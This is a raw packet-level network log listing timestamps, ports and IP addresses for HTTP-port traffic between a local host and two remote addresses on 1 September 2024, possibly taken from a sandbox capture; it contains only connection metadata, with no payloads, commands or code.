Sep 1, 2024 18:27:47.096570969 CEST	56160	80	192.168.2.4	94.228.169.44
Sep 1, 2024 18:27:47.096590996 CEST	80	56160	94.228.169.44	192.168.2.4
Sep 1, 2024 18:27:47.096623898 CEST	80	56160	94.228.169.44	192.168.2.4
Sep 1, 2024 18:27:47.096636057 CEST	80	56160	94.228.169.44	192.168.2.4
Sep 1, 2024 18:27:47.096651077 CEST	80	56160	94.228.169.44	192.168.2.4
Sep 1, 2024 18:27:47.096653938 CEST	56160	80	192.168.2.4	94.228.169.44
Sep 1, 2024 18:27:47.096688986 CEST	56160	80	192.168.2.4	94.228.169.44
Sep 1, 2024 18:27:47.096982956 CEST	80	56160	94.228.169.44	192.168.2.4
Sep 1, 2024 18:27:47.096993923 CEST	80	56160	94.228.169.44	192.168.2.4
Sep 1, 2024 18:27:47.097031116 CEST	56160	80	192.168.2.4	94.228.169.44
Sep 1, 2024 18:27:47.097117901 CEST	80	56160	94.228.169.44	192.168.2.4
Sep 1, 2024 18:27:47.097129107 CEST	80	56160	94.228.169.44	192.168.2.4
Sep 1, 2024 18:27:47.097166061 CEST	56160	80	192.168.2.4	94.228.169.44
Sep 1, 2024 18:27:47.097297907 CEST	80	56160	94.228.169.44	192.168.2.4
Sep 1, 2024 18:27:47.097306967 CEST	80	56160	94.228.169.44	192.168.2.4
Sep 1, 2024 18:27:47.097347975 CEST	56160	80	192.168.2.4	94.228.169.44
Sep 1, 2024 18:27:47.103820086 CEST	80	56160	94.228.169.44	192.168.2.4
Sep 1, 2024 18:27:47.103904009 CEST	80	56160	94.228.169.44	192.168.2.4
Sep 1, 2024 18:27:47.103914976 CEST	80	56160	94.228.169.44	192.168.2.4
Sep 1, 2024 18:27:47.103952885 CEST	56160	80	192.168.2.4	94.228.169.44
Sep 1, 2024 18:27:47.104121923 CEST	80	56160	94.228.169.44	192.168.2.4
Sep 1, 2024 18:27:47.104134083 CEST	80	56160	94.228.169.44	192.168.2.4
Sep 1, 2024 18:27:47.104171038 CEST	56160	80	192.168.2.4	94.228.169.44
Sep 1, 2024 18:27:47.104257107 CEST	80	56160	94.228.169.44	192.168.2.4
Sep 1, 2024 18:27:47.104269028 CEST	80	56160	94.228.169.44	192.168.2.4
Sep 1, 2024 18:27:47.104298115 CEST	56160	80	192.168.2.4	94.228.169.44
Sep 1, 2024 18:27:47.121205091 CEST	80	56160	94.228.169.44	192.168.2.4
Sep 1, 2024 18:27:47.121259928 CEST	56160	80	192.168.2.4	94.228.169.44
Sep 1, 2024 18:27:47.121334076 CEST	80	56160	94.228.169.44	192.168.2.4
Sep 1, 2024 18:27:47.121342897 CEST	80	56160	94.228.169.44	192.168.2.4
Sep 1, 2024 18:27:47.121380091 CEST	56160	80	192.168.2.4	94.228.169.44
Sep 1, 2024 18:27:47.121385098 CEST	80	56160	94.228.169.44	192.168.2.4
Sep 1, 2024 18:27:47.121396065 CEST	80	56160	94.228.169.44	192.168.2.4
Sep 1, 2024 18:27:47.121429920 CEST	56160	80	192.168.2.4	94.228.169.44
Sep 1, 2024 18:27:47.121537924 CEST	80	56160	94.228.169.44	192.168.2.4
Sep 1, 2024 18:27:47.121552944 CEST	80	56160	94.228.169.44	192.168.2.4
Sep 1, 2024 18:27:47.121602058 CEST	56160	80	192.168.2.4	94.228.169.44
Sep 1, 2024 18:27:47.121678114 CEST	80	56160	94.228.169.44	192.168.2.4
Sep 1, 2024 18:27:47.121691942 CEST	80	56160	94.228.169.44	192.168.2.4
Sep 1, 2024 18:27:47.121701956 CEST	80	56160	94.228.169.44	192.168.2.4
Sep 1, 2024 18:27:47.121726036 CEST	56160	80	192.168.2.4	94.228.169.44
Sep 1, 2024 18:27:47.121975899 CEST	80	56160	94.228.169.44	192.168.2.4
Sep 1, 2024 18:27:47.121987104 CEST	80	56160	94.228.169.44	192.168.2.4
Sep 1, 2024 18:27:47.121995926 CEST	80	56160	94.228.169.44	192.168.2.4
Sep 1, 2024 18:27:47.122013092 CEST	56160	80	192.168.2.4	94.228.169.44
Sep 1, 2024 18:27:47.122030973 CEST	56160	80	192.168.2.4	94.228.169.44
Sep 1, 2024 18:27:47.122260094 CEST	80	56160	94.228.169.44	192.168.2.4
Sep 1, 2024 18:27:47.122271061 CEST	80	56160	94.228.169.44	192.168.2.4
Sep 1, 2024 18:27:47.122307062 CEST	56160	80	192.168.2.4	94.228.169.44
Sep 1, 2024 18:27:47.124558926 CEST	80	56160	94.228.169.44	192.168.2.4
Sep 1, 2024 18:27:47.124649048 CEST	80	56160	94.228.169.44	192.168.2.4
Sep 1, 2024 18:27:47.124660969 CEST	80	56160	94.228.169.44	192.168.2.4
Sep 1, 2024 18:27:47.124686003 CEST	56160	80	192.168.2.4	94.228.169.44
Sep 1, 2024 18:27:47.124815941 CEST	80	56160	94.228.169.44	192.168.2.4
Sep 1, 2024 18:27:47.124864101 CEST	56160	80	192.168.2.4	94.228.169.44
Sep 1, 2024 18:27:47.124890089 CEST	80	56160	94.228.169.44	192.168.2.4
Sep 1, 2024 18:27:47.124901056 CEST	80	56160	94.228.169.44	192.168.2.4
Sep 1, 2024 18:27:47.124912024 CEST	80	56160	94.228.169.44	192.168.2.4
Sep 1, 2024 18:27:47.124921083 CEST	80	56160	94.228.169.44	192.168.2.4
Sep 1, 2024 18:27:47.124934912 CEST	56160	80	192.168.2.4	94.228.169.44
Sep 1, 2024 18:27:47.124955893 CEST	56160	80	192.168.2.4	94.228.169.44
Sep 1, 2024 18:27:47.125197887 CEST	80	56160	94.228.169.44	192.168.2.4
Sep 1, 2024 18:27:47.125207901 CEST	80	56160	94.228.169.44	192.168.2.4
Sep 1, 2024 18:27:47.125217915 CEST	80	56160	94.228.169.44	192.168.2.4
Sep 1, 2024 18:27:47.125245094 CEST	56160	80	192.168.2.4	94.228.169.44
Sep 1, 2024 18:27:47.125420094 CEST	80	56160	94.228.169.44	192.168.2.4
Sep 1, 2024 18:27:47.125431061 CEST	80	56160	94.228.169.44	192.168.2.4
Sep 1, 2024 18:27:47.125441074 CEST	80	56160	94.228.169.44	192.168.2.4
Sep 1, 2024 18:27:47.125458956 CEST	56160	80	192.168.2.4	94.228.169.44
Sep 1, 2024 18:27:47.125483990 CEST	56160	80	192.168.2.4	94.228.169.44
Sep 1, 2024 18:27:47.125693083 CEST	80	56160	94.228.169.44	192.168.2.4
Sep 1, 2024 18:27:47.125704050 CEST	80	56160	94.228.169.44	192.168.2.4
Sep 1, 2024 18:27:47.125731945 CEST	56160	80	192.168.2.4	94.228.169.44
Sep 1, 2024 18:27:47.126777887 CEST	80	56160	94.228.169.44	192.168.2.4
Sep 1, 2024 18:27:47.126842976 CEST	80	56160	94.228.169.44	192.168.2.4
Sep 1, 2024 18:27:47.126852989 CEST	80	56160	94.228.169.44	192.168.2.4
Sep 1, 2024 18:27:47.126889944 CEST	56160	80	192.168.2.4	94.228.169.44
Sep 1, 2024 18:27:47.126962900 CEST	80	56160	94.228.169.44	192.168.2.4
Sep 1, 2024 18:27:47.126974106 CEST	80	56160	94.228.169.44	192.168.2.4
Sep 1, 2024 18:27:47.127007961 CEST	56160	80	192.168.2.4	94.228.169.44
Sep 1, 2024 18:27:47.127127886 CEST	80	56160	94.228.169.44	192.168.2.4
Sep 1, 2024 18:27:47.127139091 CEST	80	56160	94.228.169.44	192.168.2.4
Sep 1, 2024 18:27:47.127147913 CEST	80	56160	94.228.169.44	192.168.2.4
Sep 1, 2024 18:27:47.127170086 CEST	56160	80	192.168.2.4	94.228.169.44
Sep 1, 2024 18:27:47.127181053 CEST	56160	80	192.168.2.4	94.228.169.44
Sep 1, 2024 18:27:47.127294064 CEST	80	56160	94.228.169.44	192.168.2.4
Sep 1, 2024 18:27:47.127305984 CEST	80	56160	94.228.169.44	192.168.2.4
Sep 1, 2024 18:27:47.127315044 CEST	80	56160	94.228.169.44	192.168.2.4
Sep 1, 2024 18:27:47.127340078 CEST	56160	80	192.168.2.4	94.228.169.44
Sep 1, 2024 18:27:47.127506018 CEST	80	56160	94.228.169.44	192.168.2.4
Sep 1, 2024 18:27:47.127516985 CEST	80	56160	94.228.169.44	192.168.2.4
Sep 1, 2024 18:27:47.127543926 CEST	56160	80	192.168.2.4	94.228.169.44
Sep 1, 2024 18:27:47.127633095 CEST	80	56160	94.228.169.44	192.168.2.4
Sep 1, 2024 18:27:47.127643108 CEST	80	56160	94.228.169.44	192.168.2.4
Sep 1, 2024 18:27:47.127676010 CEST	56160	80	192.168.2.4	94.228.169.44
Sep 1, 2024 18:27:47.135902882 CEST	80	56160	94.228.169.44	192.168.2.4
Sep 1, 2024 18:27:47.135982037 CEST	56160	80	192.168.2.4	94.228.169.44
Sep 1, 2024 18:27:47.135998011 CEST	80	56160	94.228.169.44	192.168.2.4
Sep 1, 2024 18:27:47.136008024 CEST	80	56160	94.228.169.44	192.168.2.4
Sep 1, 2024 18:27:47.136044979 CEST	56160	80	192.168.2.4	94.228.169.44
Sep 1, 2024 18:27:47.136121035 CEST	80	56160	94.228.169.44	192.168.2.4
Sep 1, 2024 18:27:47.136132956 CEST	80	56160	94.228.169.44	192.168.2.4
Sep 1, 2024 18:27:47.136164904 CEST	56160	80	192.168.2.4	94.228.169.44
Sep 1, 2024 18:27:47.136284113 CEST	80	56160	94.228.169.44	192.168.2.4
Sep 1, 2024 18:27:47.136348009 CEST	80	56160	94.228.169.44	192.168.2.4
Sep 1, 2024 18:27:47.136358976 CEST	80	56160	94.228.169.44	192.168.2.4
Sep 1, 2024 18:27:47.136392117 CEST	56160	80	192.168.2.4	94.228.169.44
Sep 1, 2024 18:27:47.136642933 CEST	80	56160	94.228.169.44	192.168.2.4
Sep 1, 2024 18:27:47.136661053 CEST	80	56160	94.228.169.44	192.168.2.4
Sep 1, 2024 18:27:47.136672020 CEST	80	56160	94.228.169.44	192.168.2.4
Sep 1, 2024 18:27:47.136687040 CEST	56160	80	192.168.2.4	94.228.169.44
Sep 1, 2024 18:27:47.136710882 CEST	56160	80	192.168.2.4	94.228.169.44
Sep 1, 2024 18:27:47.136905909 CEST	80	56160	94.228.169.44	192.168.2.4
Sep 1, 2024 18:27:47.136967897 CEST	80	56160	94.228.169.44	192.168.2.4
Sep 1, 2024 18:27:47.136979103 CEST	80	56160	94.228.169.44	192.168.2.4
Sep 1, 2024 18:27:47.136990070 CEST	80	56160	94.228.169.44	192.168.2.4
Sep 1, 2024 18:27:47.137002945 CEST	80	56160	94.228.169.44	192.168.2.4
Sep 1, 2024 18:27:47.137002945 CEST	56160	80	192.168.2.4	94.228.169.44
Sep 1, 2024 18:27:47.137031078 CEST	56160	80	192.168.2.4	94.228.169.44
Sep 1, 2024 18:27:47.137201071 CEST	80	56160	94.228.169.44	192.168.2.4
Sep 1, 2024 18:27:47.137211084 CEST	80	56160	94.228.169.44	192.168.2.4
Sep 1, 2024 18:27:47.137228012 CEST	80	56160	94.228.169.44	192.168.2.4
Sep 1, 2024 18:27:47.137238026 CEST	56160	80	192.168.2.4	94.228.169.44
Sep 1, 2024 18:27:47.137238979 CEST	80	56160	94.228.169.44	192.168.2.4
Sep 1, 2024 18:27:47.137250900 CEST	80	56160	94.228.169.44	192.168.2.4
Sep 1, 2024 18:27:47.137263060 CEST	56160	80	192.168.2.4	94.228.169.44
Sep 1, 2024 18:27:47.137285948 CEST	56160	80	192.168.2.4	94.228.169.44
Sep 1, 2024 18:27:47.137670994 CEST	80	56160	94.228.169.44	192.168.2.4
Sep 1, 2024 18:27:47.137682915 CEST	80	56160	94.228.169.44	192.168.2.4
Sep 1, 2024 18:27:47.137717009 CEST	56160	80	192.168.2.4	94.228.169.44
Sep 1, 2024 18:27:47.149754047 CEST	80	56160	94.228.169.44	192.168.2.4
Sep 1, 2024 18:27:47.149785995 CEST	80	56160	94.228.169.44	192.168.2.4
Sep 1, 2024 18:27:47.149833918 CEST	56160	80	192.168.2.4	94.228.169.44
Sep 1, 2024 18:27:47.149838924 CEST	80	56160	94.228.169.44	192.168.2.4
Sep 1, 2024 18:27:47.149919033 CEST	80	56160	94.228.169.44	192.168.2.4
Sep 1, 2024 18:27:47.149956942 CEST	56160	80	192.168.2.4	94.228.169.44
Sep 1, 2024 18:27:47.149969101 CEST	80	56160	94.228.169.44	192.168.2.4
Sep 1, 2024 18:27:47.149981022 CEST	80	56160	94.228.169.44	192.168.2.4
Sep 1, 2024 18:27:47.150010109 CEST	56160	80	192.168.2.4	94.228.169.44
Sep 1, 2024 18:27:47.150147915 CEST	80	56160	94.228.169.44	192.168.2.4
Sep 1, 2024 18:27:47.150161982 CEST	80	56160	94.228.169.44	192.168.2.4
Sep 1, 2024 18:27:47.150207043 CEST	56160	80	192.168.2.4	94.228.169.44
Sep 1, 2024 18:27:47.150352955 CEST	80	56160	94.228.169.44	192.168.2.4
Sep 1, 2024 18:27:47.150363922 CEST	80	56160	94.228.169.44	192.168.2.4
Sep 1, 2024 18:27:47.150402069 CEST	56160	80	192.168.2.4	94.228.169.44
Sep 1, 2024 18:27:47.150660038 CEST	80	56160	94.228.169.44	192.168.2.4
Sep 1, 2024 18:27:47.150671005 CEST	80	56160	94.228.169.44	192.168.2.4
Sep 1, 2024 18:27:47.150681973 CEST	80	56160	94.228.169.44	192.168.2.4
Sep 1, 2024 18:27:47.150691986 CEST	80	56160	94.228.169.44	192.168.2.4
Sep 1, 2024 18:27:47.150702953 CEST	80	56160	94.228.169.44	192.168.2.4
Sep 1, 2024 18:27:47.150706053 CEST	56160	80	192.168.2.4	94.228.169.44
Sep 1, 2024 18:27:47.150715113 CEST	80	56160	94.228.169.44	192.168.2.4
Sep 1, 2024 18:27:47.150718927 CEST	56160	80	192.168.2.4	94.228.169.44
Sep 1, 2024 18:27:47.150748014 CEST	56160	80	192.168.2.4	94.228.169.44
Sep 1, 2024 18:27:47.150919914 CEST	80	56160	94.228.169.44	192.168.2.4
Sep 1, 2024 18:27:47.150933027 CEST	80	56160	94.228.169.44	192.168.2.4
Sep 1, 2024 18:27:47.150973082 CEST	56160	80	192.168.2.4	94.228.169.44
Sep 1, 2024 18:27:47.151072025 CEST	80	56160	94.228.169.44	192.168.2.4
Sep 1, 2024 18:27:47.151083946 CEST	80	56160	94.228.169.44	192.168.2.4
Sep 1, 2024 18:27:47.151093006 CEST	80	56160	94.228.169.44	192.168.2.4
Sep 1, 2024 18:27:47.151104927 CEST	80	56160	94.228.169.44	192.168.2.4
Sep 1, 2024 18:27:47.151118994 CEST	56160	80	192.168.2.4	94.228.169.44
Sep 1, 2024 18:27:47.151119947 CEST	80	56160	94.228.169.44	192.168.2.4
Sep 1, 2024 18:27:47.151130915 CEST	80	56160	94.228.169.44	192.168.2.4
Sep 1, 2024 18:27:47.151145935 CEST	56160	80	192.168.2.4	94.228.169.44
Sep 1, 2024 18:27:47.151165009 CEST	56160	80	192.168.2.4	94.228.169.44
Sep 1, 2024 18:27:47.166843891 CEST	80	56160	94.228.169.44	192.168.2.4
Sep 1, 2024 18:27:47.166865110 CEST	80	56160	94.228.169.44	192.168.2.4
Sep 1, 2024 18:27:47.166876078 CEST	80	56160	94.228.169.44	192.168.2.4
Sep 1, 2024 18:27:47.166893005 CEST	80	56160	94.228.169.44	192.168.2.4
Sep 1, 2024 18:27:47.166906118 CEST	80	56160	94.228.169.44	192.168.2.4
Sep 1, 2024 18:27:47.166915894 CEST	80	56160	94.228.169.44	192.168.2.4
Sep 1, 2024 18:27:47.166929007 CEST	80	56160	94.228.169.44	192.168.2.4
Sep 1, 2024 18:27:47.166950941 CEST	56160	80	192.168.2.4	94.228.169.44
Sep 1, 2024 18:27:47.166977882 CEST	56160	80	192.168.2.4	94.228.169.44
Sep 1, 2024 18:27:47.193727970 CEST	80	56160	94.228.169.44	192.168.2.4
Sep 1, 2024 18:27:47.193739891 CEST	80	56160	94.228.169.44	192.168.2.4
Sep 1, 2024 18:27:47.193749905 CEST	80	56160	94.228.169.44	192.168.2.4
Sep 1, 2024 18:27:47.193780899 CEST	80	56160	94.228.169.44	192.168.2.4
Sep 1, 2024 18:27:47.193805933 CEST	56160	80	192.168.2.4	94.228.169.44
Sep 1, 2024 18:27:47.193821907 CEST	56160	80	192.168.2.4	94.228.169.44
Sep 1, 2024 18:27:47.193860054 CEST	80	56160	94.228.169.44	192.168.2.4
Sep 1, 2024 18:27:47.193871021 CEST	80	56160	94.228.169.44	192.168.2.4
Sep 1, 2024 18:27:47.193881035 CEST	80	56160	94.228.169.44	192.168.2.4
Sep 1, 2024 18:27:47.193898916 CEST	56160	80	192.168.2.4	94.228.169.44
Sep 1, 2024 18:27:47.193917036 CEST	56160	80	192.168.2.4	94.228.169.44
Sep 1, 2024 18:27:47.194077969 CEST	80	56160	94.228.169.44	192.168.2.4
Sep 1, 2024 18:27:47.194113970 CEST	80	56160	94.228.169.44	192.168.2.4
Sep 1, 2024 18:27:47.194125891 CEST	80	56160	94.228.169.44	192.168.2.4
Sep 1, 2024 18:27:47.194133997 CEST	80	56160	94.228.169.44	192.168.2.4
Sep 1, 2024 18:27:47.194169998 CEST	56160	80	192.168.2.4	94.228.169.44
Sep 1, 2024 18:27:47.194406986 CEST	80	56160	94.228.169.44	192.168.2.4
Sep 1, 2024 18:27:47.194416046 CEST	80	56160	94.228.169.44	192.168.2.4
Sep 1, 2024 18:27:47.194426060 CEST	80	56160	94.228.169.44	192.168.2.4
Sep 1, 2024 18:27:47.194437981 CEST	80	56160	94.228.169.44	192.168.2.4
Sep 1, 2024 18:27:47.194451094 CEST	56160	80	192.168.2.4	94.228.169.44
Sep 1, 2024 18:27:47.194468975 CEST	56160	80	192.168.2.4	94.228.169.44
Sep 1, 2024 18:27:47.194756031 CEST	80	56160	94.228.169.44	192.168.2.4
Sep 1, 2024 18:27:47.194766045 CEST	80	56160	94.228.169.44	192.168.2.4
Sep 1, 2024 18:27:47.194820881 CEST	56160	80	192.168.2.4	94.228.169.44
Sep 1, 2024 18:27:47.200964928 CEST	80	56160	94.228.169.44	192.168.2.4
Sep 1, 2024 18:27:47.201040983 CEST	80	56160	94.228.169.44	192.168.2.4
Sep 1, 2024 18:27:47.201052904 CEST	80	56160	94.228.169.44	192.168.2.4
Sep 1, 2024 18:27:47.201082945 CEST	56160	80	192.168.2.4	94.228.169.44
Sep 1, 2024 18:27:47.201229095 CEST	80	56160	94.228.169.44	192.168.2.4
Sep 1, 2024 18:27:47.201268911 CEST	56160	80	192.168.2.4	94.228.169.44
Sep 1, 2024 18:27:47.201277971 CEST	80	56160	94.228.169.44	192.168.2.4
Sep 1, 2024 18:27:47.201288939 CEST	80	56160	94.228.169.44	192.168.2.4
Sep 1, 2024 18:27:47.201299906 CEST	80	56160	94.228.169.44	192.168.2.4
Sep 1, 2024 18:27:47.201308966 CEST	80	56160	94.228.169.44	192.168.2.4
Sep 1, 2024 18:27:47.201323986 CEST	56160	80	192.168.2.4	94.228.169.44
Sep 1, 2024 18:27:47.201339006 CEST	56160	80	192.168.2.4	94.228.169.44
Sep 1, 2024 18:27:47.211457014 CEST	80	56160	94.228.169.44	192.168.2.4
Sep 1, 2024 18:27:47.211551905 CEST	80	56160	94.228.169.44	192.168.2.4
Sep 1, 2024 18:27:47.211563110 CEST	80	56160	94.228.169.44	192.168.2.4
Sep 1, 2024 18:27:47.211594105 CEST	56160	80	192.168.2.4	94.228.169.44
Sep 1, 2024 18:27:47.211744070 CEST	80	56160	94.228.169.44	192.168.2.4
Sep 1, 2024 18:27:47.211755037 CEST	80	56160	94.228.169.44	192.168.2.4
Sep 1, 2024 18:27:47.211765051 CEST	80	56160	94.228.169.44	192.168.2.4
Sep 1, 2024 18:27:47.211776018 CEST	80	56160	94.228.169.44	192.168.2.4
Sep 1, 2024 18:27:47.211782932 CEST	56160	80	192.168.2.4	94.228.169.44
Sep 1, 2024 18:27:47.211798906 CEST	56160	80	192.168.2.4	94.228.169.44
Sep 1, 2024 18:27:47.212143898 CEST	80	56160	94.228.169.44	192.168.2.4
Sep 1, 2024 18:27:47.212155104 CEST	80	56160	94.228.169.44	192.168.2.4
Sep 1, 2024 18:27:47.212165117 CEST	80	56160	94.228.169.44	192.168.2.4
Sep 1, 2024 18:27:47.212181091 CEST	80	56160	94.228.169.44	192.168.2.4
Sep 1, 2024 18:27:47.212187052 CEST	56160	80	192.168.2.4	94.228.169.44
Sep 1, 2024 18:27:47.212192059 CEST	80	56160	94.228.169.44	192.168.2.4
Sep 1, 2024 18:27:47.212203979 CEST	80	56160	94.228.169.44	192.168.2.4
Sep 1, 2024 18:27:47.212208033 CEST	56160	80	192.168.2.4	94.228.169.44
Sep 1, 2024 18:27:47.212214947 CEST	80	56160	94.228.169.44	192.168.2.4
Sep 1, 2024 18:27:47.212234020 CEST	56160	80	192.168.2.4	94.228.169.44
Sep 1, 2024 18:27:47.212258101 CEST	56160	80	192.168.2.4	94.228.169.44
Sep 1, 2024 18:27:47.213313103 CEST	80	56160	94.228.169.44	192.168.2.4
Sep 1, 2024 18:27:47.213337898 CEST	80	56160	94.228.169.44	192.168.2.4
Sep 1, 2024 18:27:47.213347912 CEST	80	56160	94.228.169.44	192.168.2.4
Sep 1, 2024 18:27:47.213391066 CEST	56160	80	192.168.2.4	94.228.169.44
Sep 1, 2024 18:27:47.213479042 CEST	80	56160	94.228.169.44	192.168.2.4
Sep 1, 2024 18:27:47.213490009 CEST	80	56160	94.228.169.44	192.168.2.4
Sep 1, 2024 18:27:47.213499069 CEST	80	56160	94.228.169.44	192.168.2.4
Sep 1, 2024 18:27:47.213510990 CEST	80	56160	94.228.169.44	192.168.2.4
Sep 1, 2024 18:27:47.213520050 CEST	56160	80	192.168.2.4	94.228.169.44
Sep 1, 2024 18:27:47.213536024 CEST	56160	80	192.168.2.4	94.228.169.44
Sep 1, 2024 18:27:47.213793993 CEST	80	56160	94.228.169.44	192.168.2.4
Sep 1, 2024 18:27:47.213835955 CEST	56160	80	192.168.2.4	94.228.169.44
Sep 1, 2024 18:27:47.213865042 CEST	80	56160	94.228.169.44	192.168.2.4
Sep 1, 2024 18:27:47.213994026 CEST	80	56160	94.228.169.44	192.168.2.4
Sep 1, 2024 18:27:47.214004993 CEST	80	56160	94.228.169.44	192.168.2.4
Sep 1, 2024 18:27:47.214015961 CEST	80	56160	94.228.169.44	192.168.2.4
Sep 1, 2024 18:27:47.214032888 CEST	56160	80	192.168.2.4	94.228.169.44
Sep 1, 2024 18:27:47.214063883 CEST	56160	80	192.168.2.4	94.228.169.44
Sep 1, 2024 18:27:47.214236021 CEST	80	56160	94.228.169.44	192.168.2.4
Sep 1, 2024 18:27:47.214246988 CEST	80	56160	94.228.169.44	192.168.2.4
Sep 1, 2024 18:27:47.214257002 CEST	80	56160	94.228.169.44	192.168.2.4
Sep 1, 2024 18:27:47.214277983 CEST	56160	80	192.168.2.4	94.228.169.44
Sep 1, 2024 18:27:47.215373993 CEST	80	56160	94.228.169.44	192.168.2.4
Sep 1, 2024 18:27:47.215425014 CEST	56160	80	192.168.2.4	94.228.169.44
Sep 1, 2024 18:27:47.215452909 CEST	80	56160	94.228.169.44	192.168.2.4
Sep 1, 2024 18:27:47.215464115 CEST	80	56160	94.228.169.44	192.168.2.4
Sep 1, 2024 18:27:47.215501070 CEST	56160	80	192.168.2.4	94.228.169.44
Sep 1, 2024 18:27:47.215625048 CEST	80	56160	94.228.169.44	192.168.2.4
Sep 1, 2024 18:27:47.215714931 CEST	80	56160	94.228.169.44	192.168.2.4
Sep 1, 2024 18:27:47.215725899 CEST	80	56160	94.228.169.44	192.168.2.4
Sep 1, 2024 18:27:47.215737104 CEST	80	56160	94.228.169.44	192.168.2.4
Sep 1, 2024 18:27:47.215749979 CEST	80	56160	94.228.169.44	192.168.2.4
Sep 1, 2024 18:27:47.215753078 CEST	56160	80	192.168.2.4	94.228.169.44
Sep 1, 2024 18:27:47.215770006 CEST	56160	80	192.168.2.4	94.228.169.44
Sep 1, 2024 18:27:47.216084003 CEST	80	56160	94.228.169.44	192.168.2.4
Sep 1, 2024 18:27:47.216103077 CEST	80	56160	94.228.169.44	192.168.2.4
Sep 1, 2024 18:27:47.216114044 CEST	80	56160	94.228.169.44	192.168.2.4
Sep 1, 2024 18:27:47.216124058 CEST	80	56160	94.228.169.44	192.168.2.4
Sep 1, 2024 18:27:47.216125965 CEST	56160	80	192.168.2.4	94.228.169.44
Sep 1, 2024 18:27:47.216145039 CEST	56160	80	192.168.2.4	94.228.169.44
Sep 1, 2024 18:27:47.216146946 CEST	80	56160	94.228.169.44	192.168.2.4
Sep 1, 2024 18:27:47.216192007 CEST	56160	80	192.168.2.4	94.228.169.44
Sep 1, 2024 18:27:47.216435909 CEST	80	56160	94.228.169.44	192.168.2.4
Sep 1, 2024 18:27:47.216448069 CEST	80	56160	94.228.169.44	192.168.2.4
Sep 1, 2024 18:27:47.216502905 CEST	56160	80	192.168.2.4	94.228.169.44
Sep 1, 2024 18:27:47.224519014 CEST	80	56160	94.228.169.44	192.168.2.4
Sep 1, 2024 18:27:47.224679947 CEST	80	56160	94.228.169.44	192.168.2.4
Sep 1, 2024 18:27:47.224689960 CEST	80	56160	94.228.169.44	192.168.2.4
Sep 1, 2024 18:27:47.224711895 CEST	80	56160	94.228.169.44	192.168.2.4
Sep 1, 2024 18:27:47.224724054 CEST	80	56160	94.228.169.44	192.168.2.4
Sep 1, 2024 18:27:47.224734068 CEST	80	56160	94.228.169.44	192.168.2.4
Sep 1, 2024 18:27:47.224736929 CEST	56160	80	192.168.2.4	94.228.169.44
Sep 1, 2024 18:27:47.224760056 CEST	56160	80	192.168.2.4	94.228.169.44
Sep 1, 2024 18:27:47.224781990 CEST	56160	80	192.168.2.4	94.228.169.44
Sep 1, 2024 18:27:47.224919081 CEST	80	56160	94.228.169.44	192.168.2.4
Sep 1, 2024 18:27:47.225023985 CEST	80	56160	94.228.169.44	192.168.2.4
Sep 1, 2024 18:27:47.225059032 CEST	56160	80	192.168.2.4	94.228.169.44
Sep 1, 2024 18:27:47.225215912 CEST	80	56160	94.228.169.44	192.168.2.4
Sep 1, 2024 18:27:47.225264072 CEST	80	56160	94.228.169.44	192.168.2.4
Sep 1, 2024 18:27:47.225300074 CEST	56160	80	192.168.2.4	94.228.169.44
Sep 1, 2024 18:27:47.319341898 CEST	56161	80	192.168.2.4	191.191.224.16
Sep 1, 2024 18:27:47.324438095 CEST	80	56161	191.191.224.16	192.168.2.4
Sep 1, 2024 18:27:47.324515104 CEST	56161	80	192.168.2.4	191.191.224.16
Sep 1, 2024 18:27:47.324671984 CEST	56161	80	192.168.2.4	191.191.224.16
Sep 1, 2024 18:27:47.324704885 CEST	56161	80	192.168.2.4	191.191.224.16
Sep 1, 2024 18:27:47.329457045 CEST	80	56161	191.191.224.16	192.168.2.4
Sep 1, 2024 18:27:47.329514980 CEST	80	56161	191.191.224.16	192.168.2.4
Sep 1, 2024 18:27:48.593642950 CEST	80	56161	191.191.224.16	192.168.2.4
Sep 1, 2024 18:27:48.594027042 CEST	80	56161	191.191.224.16	192.168.2.4
Sep 1, 2024 18:27:48.594093084 CEST	56161	80	192.168.2.4	191.191.224.16
Sep 1, 2024 18:27:48.594157934 CEST	56161	80	192.168.2.4	191.191.224.16
Sep 1, 2024 18:27:48.596525908 CEST	56162	80	192.168.2.4	191.191.224.16
Sep 1, 2024 18:27:48.598978996 CEST	80	56161	191.191.224.16	192.168.2.4
Sep 1, 2024 18:27:48.601404905 CEST	80	56162	191.191.224.16	192.168.2.4
Sep 1, 2024 18:27:48.605211973 CEST	56162	80	192.168.2.4	191.191.224.16
Sep 1, 2024 18:27:48.605501890 CEST	56162	80	192.168.2.4	191.191.224.16
Sep 1, 2024 18:27:48.605535030 CEST	56162	80	192.168.2.4	191.191.224.16
Sep 1, 2024 18:27:48.610315084 CEST	80	56162	191.191.224.16	192.168.2.4
Sep 1, 2024 18:27:48.610447884 CEST	80	56162	191.191.224.16	192.168.2.4
Sep 1, 2024 18:27:50.132550955 CEST	80	56162	191.191.224.16	192.168.2.4
Sep 1, 2024 18:27:50.133266926 CEST	80	56162	191.191.224.16	192.168.2.4
Sep 1, 2024 18:27:50.133325100 CEST	56162	80	192.168.2.4	191.191.224.16
Sep 1, 2024 18:27:50.133410931 CEST	56162	80	192.168.2.4	191.191.224.16
Sep 1, 2024 18:27:50.137764931 CEST	56164	80	192.168.2.4	191.191.224.16
Sep 1, 2024 18:27:50.138343096 CEST	80	56162	191.191.224.16	192.168.2.4
Sep 1, 2024 18:27:50.142678976 CEST	80	56164	191.191.224.16	192.168.2.4
Sep 1, 2024 18:27:50.142790079 CEST	56164	80	192.168.2.4	191.191.224.16
Sep 1, 2024 18:27:50.142952919 CEST	56164	80	192.168.2.4	191.191.224.16
Sep 1, 2024 18:27:50.142968893 CEST	56164	80	192.168.2.4	191.191.224.16
Sep 1, 2024 18:27:50.147730112 CEST	80	56164	191.191.224.16	192.168.2.4
Sep 1, 2024 18:27:50.147895098 CEST	80	56164	191.191.224.16	192.168.2.4
Sep 1, 2024 18:27:51.304187059 CEST	80	56160	94.228.169.44	192.168.2.4
Sep 1, 2024 18:27:51.304260015 CEST	56160	80	192.168.2.4	94.228.169.44
Sep 1, 2024 18:27:51.304352045 CEST	56160	80	192.168.2.4	94.228.169.44
Sep 1, 2024 18:27:51.309130907 CEST	80	56160	94.228.169.44	192.168.2.4
Sep 1, 2024 18:27:51.384614944 CEST	80	56164	191.191.224.16	192.168.2.4
Sep 1, 2024 18:27:51.385198116 CEST	80	56164	191.191.224.16	192.168.2.4
Sep 1, 2024 18:27:51.385278940 CEST	56164	80	192.168.2.4	191.191.224.16
Sep 1, 2024 18:27:51.385356903 CEST	56164	80	192.168.2.4	191.191.224.16
Sep 1, 2024 18:27:51.387926102 CEST	56165	80	192.168.2.4	191.191.224.16
